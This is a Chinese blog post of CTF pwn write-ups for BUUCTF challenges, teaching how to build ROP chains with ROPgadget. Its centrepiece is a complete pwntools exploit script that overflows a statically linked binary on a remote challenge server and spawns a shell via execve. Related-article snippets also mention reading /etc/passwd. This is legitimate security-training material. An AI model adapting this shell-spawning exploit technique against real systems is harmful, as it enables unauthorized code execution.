buuctf pwn wp(第八波)学会利用ROPgadget

最新推荐文章于 2024-04-09 10:43:56 发布
最新推荐文章于 2024-04-09 10:43:56 发布
阅读量1.7k 收藏 5
点赞数 1
分类专栏: CTF pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847969/article/details/105010330
版权
CTF 同时被 2 个专栏收录
22 篇文章 1 订阅
订阅专栏
pwn
15 篇文章 0 订阅
订阅专栏

inndy_rop

简单利用ROPgadget
https://www.cnblogs.com/bhxdn/p/12347296.html

可以看到有很多字符串,很多函数,这不正常(原因是这个文件是静态编译的,他的函数不是来自于调用libc库)
在这里插入图片描述

这个是我们就可以使用工具ROPgadget,凡是这种静态编译的都可以用工具自行生成ROPchain(ROP链)
在这里插入图片描述
然后我们把他自动生成的脚本加上pwntools的东西就可以了
在这里插入图片描述

from pwn import *
from struct import pack

#io = process('./rop')
io = remote('hackme.inndy.tw',7704)

# Padding goes here
p = 'a'*0xc + 'aaaa'

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

io.sendline(p)

io.interactive()

jarvisoj_level2_x64

https://blog.csdn.net/michaelinfinity/article/details/88584349
看main函数,没东西,点进vulun函数
在这里插入图片描述
看到了system和一个read漏洞,问题是这个system里面不是command了,而是一串字符串,那么我们之前的利用查看十六进制办法应该也管用,但是在这里我们使用另外一种方法
在这里插入图片描述

[HarekazeCTF2019]baby_rop

需要注意这道题的flag不在当前目录下,所以要用下面这个命令
cat ./home/babyrop/flag
https://blog.csdn.net/qinying001/article/details/104294784?depth_1-utm_source=distribute.pc_relevant.none-task&utm_source=distribute.pc_relevant.none-task

月阴荒
关注
专栏目录
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2570
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2079
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
ROPgadget:使用此工具,您可以在二进制文件中搜索小工具,以方便您对ROP利用ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS架构上支持ELF,PE和Mach-O格式
05-02
ROPgadget工具 使用此工具,您可以在二进制文件中搜索小工具,以方便您对ROP利用ROPgadget在x86,x64,ARM,ARM64,PowerPC,SPARC和MIPS体系结构上支持ELF / PE / Mach-O格式。 从版本5开始,ROPgadget具有一个新的内核,该内核是使用Capstone拆卸框架针对小工具搜索引擎用Python编写的-较旧的版本可以在Archives目录中找到,但将无法维护。 安装 如果要使用ROPgadget,则必须先安装 。 对于Capstone在nix机器上的安装: $ sudo pip install capstone Capstone支持多种平台(Windows,iOS,Android,cygwin ...)。 对于交叉编译,请参考文件。 安装Capstone后,ROPgadget可以用作独立工具: $ ROPgadget.
基本ROPROPgadget
qq_62539372的博客
04-02 918
把对应获取 shell 的系统调用的参数放到对应的寄存器中,那么我们在执行 int 0x80 就可执行对应的系统调用。例题: bamboofox 中的 ret2syscall。检查保护机制 堆栈不可执行 随机地址没开。获得 /bin/sh 字符串对应的地址。寻找控制 ebx 的gadgets。寻找控制 eax 的gadgets。利用gadgets获得shell。bx bin/sh的地址。int 80 的地址。
hackme pwn rop [ROPgadget]
ACdream
02-01 535
IDA找漏洞点很快    所以,栈溢出的偏移值为:0xC + 0x4 = 0x10 因为开了NX,所以需要ROP~ 剩下的就是工具: ROPgadget --binary rop --ropchain  
探秘安全领域利器:`ROPgadget` - 反向工程与漏洞利用的新工具
gitblog_00017的博客
03-22 319
探秘安全领域利器:ROPgadget - 反向工程与漏洞利用的新工具 项目地址:https://gitcode.com/JonathanSalwan/ROPgadget 项目简介 在网络安全的世界里,ROPgadget 是一个非常实用的开源工具,由 Jonathan Salwan 开发并托管在 GitCode 上。它主要用于分析二进制文件,搜索可用于 Return-Oriented Program...
PWN中的ROPgadget
LL021101的博客
03-27 3341
文章目录 前言 一、什么时候使用ROP,以及怎么使用 二、平衡栈帧 总结 前言 ROPgadget是一种基于代码复用的一种攻击技术。 一、ROP的使用(其中一种) 我们做pwn的时候,一般我们的目标是找到system函数和“/bin/sh”字符串,但是基本上pwn题是不会让你这么简单就解决了,他会隐藏system函数,和/bin/sh字符串,此时我们就要用到ROP方法。 ROPgadget --binary rop --only 'pop|ret' //单引号中间的...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 345
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
BUUCTF pwn rip
weixin_55190422的博客
11-03 335
现在开始是记录我个人对BUU上PWN题的刷题记录。 首先是一个ELF文件,放到Linux里面来看。 首先老套路checksec一下 接着我们将这个文件放到IDA中静态分析、 shift F12 一下看看敏感字段 我们发现里面有个系统调用函数。我们查看下汇编代码 我们查看Stack of main 视图发现只要存入15个字节就可以返回fun函数 所以payload: from pwn import * p = remote('node4.buuoj.cn',...
ROPgadget.zip
09-17
pip install ropgadget下载总是中断的可以试试,pwn必备工具ROPgadget,
exrop:自动ROPChain生成
04-23
多余的 Exrop是自动ROP链生成器工具,可以根据给定的二进制文件和约束条件自动构建小工具链 要求: , 目前仅支持x86-64! 特征: 处理单向小工具(jmp reg,call reg) 设置寄存器( rdi=0xxxxxx, rsi=0xxxxxx ) 将寄存器设置为寄存器( rdi=rax ) 写给内存 将字符串/字节写入内存 函数调用( open('/etc/passwd',0) ) 函数调用中的传递寄存器( read('rax', bss, 0x100) ) 避免坏蛋 堆栈Exrop.stack_pivot ( Exrop.stack_pivot ) syscall( Exrop.syscall ) 看 安装 安装python(推荐并测试3.6) 安装triton( ),确保将-DPYTHON36=on添加为cmake选项 安装ropgadget(
kali安装ROPgadget报错.docx
11-18
kali安装ROPgadget报错,pkg_resources.ResolutionError: Script 'scripts/ROPgadget' not found in metadata at '/usr/local/lib/python2.7/dist-packages/ROPGadget-5.9.dist-info'
ROPR:一款功能强大的极速多线程ROPGadget查找工具
阿道夫的博客
02-10 1489
Programming),即返回导向编程,而ROPGadget是一些包含汇编指令的代码段,通常以ret指令结尾,这些指令已经作为可执行代码存在于每个源码文件或代码库中,而这些小工具可用于二进制攻击,并破坏易受攻击的可执行文件。大多数可执行文件包含足够的小工具来编写ROP链一旦我们知道了地址,就可以使用包含在同一地址空间(如libc)中的动态库。而使用ROPGadget的好处在于,无需在任何地方编写新的可执行代码,攻击者可以仅使用程序中已经存在的代码来实现其目标。这时候你当然需要一份系统性的学习路线。
ROPgadget初识 ——— ret2syscall
qq_41696518的博客
07-01 1204
PWN
pwn练习1-ret2syscall(ROP-gadget)
m0_51756263的博客
10-07 1632
pwn练习1-ret2syscall(ROP-gadget)
ROPgadget使用
最新发布
Jingged的博客
04-09 940
需要注意的是,ROPgadget只是工具的一部分,成功的ROP攻击还需要深入理解目标二进制文件的结构和行为,以及攻击场景的具体细节。此外,随着软件安全性的提高和漏洞修复的不断进行,可用的gadgets可能会变得越来越少,因此在使用ROPgadget时,最好与其他工具和技术结合起来进行更全面的分析和利用开发。ROPgadget是一种基于代码复用技术的攻击工具,它可以帮助攻击者在二进制文件中找到可利用的代码片段(即ROP链中的gadgets),从而构建出有效的攻击载荷。是你想要分析的二进制文件的路径,
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 1042
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值